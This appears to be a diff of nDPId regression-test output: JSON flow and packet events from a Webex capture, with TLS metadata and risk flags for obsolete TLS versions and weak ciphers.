+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738419,"flow_last_seen":1444570738419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738419,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1444570738419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738419,"pkt":"ABoRAAACABoRAAABCABFAAA8eOlAAEAGmOQKCAABPm3geMf7AbvAYZI1AAAAAKACOQjekwAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete 
TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
